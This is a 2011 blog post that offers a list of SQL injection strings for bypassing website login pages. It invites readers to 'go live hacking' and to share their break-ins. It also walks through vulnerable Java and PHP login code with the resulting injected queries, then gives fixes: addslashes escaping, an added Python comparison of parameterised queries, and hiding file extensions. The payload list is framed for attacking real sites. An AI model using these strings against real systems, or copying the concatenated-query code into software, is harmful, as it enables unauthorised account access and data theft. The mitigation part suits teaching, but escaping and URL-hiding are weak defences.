Monday, September 5, 2011

SQL injection strings for Hack Any Login Page




Here I am posting some of the SQL injection strings that you can use to hack into a website's login page.
I have done some practical work with these; if someone wants to go live hacking using these SQL injection strings, contact me.
If someone is a pro at breaking into vulnerable systems and sites, please share your experiences.
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
This is a short list, but these SQL injection strings are very powerful.
I have another hint:
Not every SQL database accepts every one of these strings.
For example
" or "a"="a
') or ('a'='a
On some databases one will work and the other won't. The first one assumes the query encloses the username (or password) in double quotes: the input first CLOSES the quotes (making the value ""), then appends or "a"="a, and the query's own final quote closes the last a. Since "a"="a" is always true, the WHERE clause matches every row.
The second one assumes the query wraps the value in parentheses and single quotes, as in ('Username'); the input turns that into ('') or ('a'='a').
Enjoy the HACK DAY :)

SQL injection against login code works like this.

Login Java Code

import java.sql.*;

// Vulnerable as written: the SQL text is built by concatenating the raw request parameters.
String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
Connection connection = DriverManager.getConnection("jdbc:odbc:projectDB");

String query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password + "'";

// prepareStatement() gives no protection here: the values are already part of the SQL text.
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();

if (users.next()) {
    // login succeeded: some thing here
} else {
    // login failed
}
The injection works like this (the query as it reaches the database):
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";

Login PHP Code
<?php
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];

// Vulnerable as written: the values are interpolated straight into the SQL text.
$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";

$result=mysql_query($sql);
$count=mysql_num_rows($result);

if($count==1){
    //some code: login succeeded
}
else {
    //login failed
}
?>
Injected inputs: Username = ' OR 1=1;// and Password = ....
The injection works like this (the query as it reaches the database):
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";

How to avoid these mistakes: use the addslashes() function, which escapes the string by putting a backslash before each quote character, in Java and PHP. Escaping only helps where the value sits inside quotes in the query; a prepared statement with bound parameters keeps the input out of the SQL text entirely and is the more robust fix.

//Java Code (Java has no built-in addSlashes(); this is the author's pseudocode for an escaping helper)
userid = addSlashes(userid);

// PHP Code
$myusername=addslashes($_POST['usr']);
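The Java and PHP login queries above, the post's addslashes() idea, and the parameterised alternative, rebuilt as an added example in Python over an in-memory SQLite table (this is not the post's own code; the users table, the password and the two inputs are constructed). SQLite escapes a quote by doubling it rather than with a backslash, so the escaping variant here does for SQLite what addslashes() does for MySQL, which is itself why escaping is database-specific and bound parameters are the robust fix.

```python
# Added example, not from the original post: the post's login query rebuilt
# three ways over an in-memory SQLite table. All data here is constructed.
import sqlite3


def make_db():
    """Constructed sample table with a single account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return con


def login_concat(con, user, pw):
    """The post's pattern: SQL built by string concatenation, so quote and
    comment characters in the input become part of the SQL grammar."""
    sql = "SELECT * FROM users WHERE user='" + user + "' AND password='" + pw + "'"
    return con.execute(sql).fetchone() is not None


def esc(s):
    """SQLite-style escaping: double every single quote. addslashes() adds
    backslashes instead, which MySQL honours and SQLite does not."""
    return s.replace("'", "''")


def login_escaped(con, user, pw):
    """The post's escaping fix, done the way this database requires.
    It blocks the quoted strings, but the rule differs per database."""
    sql = "SELECT * FROM users WHERE user='" + esc(user) + "' AND password='" + esc(pw) + "'"
    return con.execute(sql).fetchone() is not None


def login_param(con, user, pw):
    """Parameterised query: values travel separately from the SQL text, so
    no input can change the statement's structure, whatever the database."""
    sql = "SELECT * FROM users WHERE user=? AND password=?"
    return con.execute(sql, (user, pw)).fetchone() is not None


def demo():
    """Returns {variant: (legitimate login ok, [result per injected attempt])}."""
    con = make_db()
    good = ("admin", "s3cret-constructed")
    # Two strings from the post: a comment that truncates the password check,
    # and an always-true OR placed in the password field.
    attempts = [("admin'--", "wrong"), ("admin", "' or 'a'='a")]
    variants = (("concat", login_concat), ("escaped", login_escaped), ("param", login_param))
    return {name: (fn(con, *good), [fn(con, *a) for a in attempts]) for name, fn in variants}


if __name__ == "__main__":
    for name, (legit, injected) in demo().items():
        print(f"{name:8s} legitimate={legit} injected={injected}")
```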
Hackers are smarter than programmers, so always hide the file extension (e.g. *.jsp, *.php, *.asp):

http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java, map these URLs in the web.xml file; in PHP, write an .htaccess file in the root directory. This only hides which technology is in use; the query itself still has to be fixed.


By Kaila Piyush
HackingArticles4all.blogspot.com
